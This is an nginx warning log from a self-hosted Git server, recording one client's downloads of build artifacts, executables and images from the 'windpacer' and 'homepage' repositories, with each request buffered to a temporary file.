2026/02/17 17:18:01 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/14/0000015144 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg"
2026/02/17 17:18:04 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/14/0000015145 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg"
2026/02/17 17:18:06 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/14/0000015146 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg"
2026/02/17 17:18:12 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/14/0000015147 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg"
2026/02/17 17:18:23 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/14/0000015148 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg"
2026/02/17 17:18:28 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/14/0000015149 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg"
2026/02/17 17:21:24 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/15/0000015150 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe"
2026/02/17 17:23:17 [warn] 923#923: *73870 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/15/0000015151 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll"
2026/02/17 17:23:35 [warn] 923#923: *73870 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/15/0000015152 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe"
2026/02/17 17:32:15 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/15/0000015153 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 17:32:22 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/15/0000015154 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png"
2026/02/17 17:32:31 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/15/0000015155 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png"
2026/02/17 17:32:34 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/15/0000015156 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 17:35:58 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/15/0000015157 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe"
2026/02/17 17:37:40 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/15/0000015158 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg"
2026/02/17 17:40:39 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/15/0000015159 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html"
2026/02/17 17:40:42 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/16/0000015160 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html"
2026/02/17 17:40:54 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/16/0000015161 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png"
2026/02/17 18:08:18 [warn] 931#931: *78190 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/16/0000015162 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md"
2026/02/17 18:11:45 [warn] 931#931: *78190 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/16/0000015163 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md"
2026/02/17 18:15:28 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/16/0000015164 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=rendered HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=rendered", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md"
2026/02/17 18:15:32 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/16/0000015165 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md"
2026/02/17 18:17:27 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000015166 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz"
2026/02/17 18:23:06 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/16/0000015167 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe"
2026/02/17 18:23:09 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/16/0000015168 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe"
2026/02/17 18:26:16 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/16/0000015169 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc"
2026/02/17 18:26:43 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/17/0000015170 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz"
2026/02/17 18:27:28 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/17/0000015171 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz"
2026/02/17 18:27:30 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/17/0000015172 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz"
2026/02/17 18:32:01 [warn] 934#934: *81220 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/17/0000015173 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico"
2026/02/17 18:32:45 [warn] 934#934: *81220 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/17/0000015174 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip"
2026/02/17 18:49:25 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/91/0000015918 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg"
2026/02/17 18:49:58 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/91/0000015919 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg"
2026/02/17 18:50:40 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/92/0000015920 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg"
2026/02/17 18:50:49 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/92/0000015921 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz"
2026/02/17 18:50:51 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/92/0000015922 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz"
2026/02/17 18:54:23 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/92/0000015923 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz"
2026/02/17 18:56:36 [warn] 929#929: *85716 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/92/0000015924 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe"
2026/02/17 18:56:45 [warn] 929#929: *85716 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/92/0000015925 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe"
2026/02/17 19:42:09 [warn] 931#931: *90771 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/92/0000015926 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg"
2026/02/17 19:49:46 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/92/0000015927 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html"
2026/02/17 19:50:23 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/92/0000015928 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html"
2026/02/17 19:51:27 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/92/0000015929 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg"
2026/02/17 19:51:30 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/93/0000015930 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg"
2026/02/17 19:51:32 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/93/0000015931 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg"
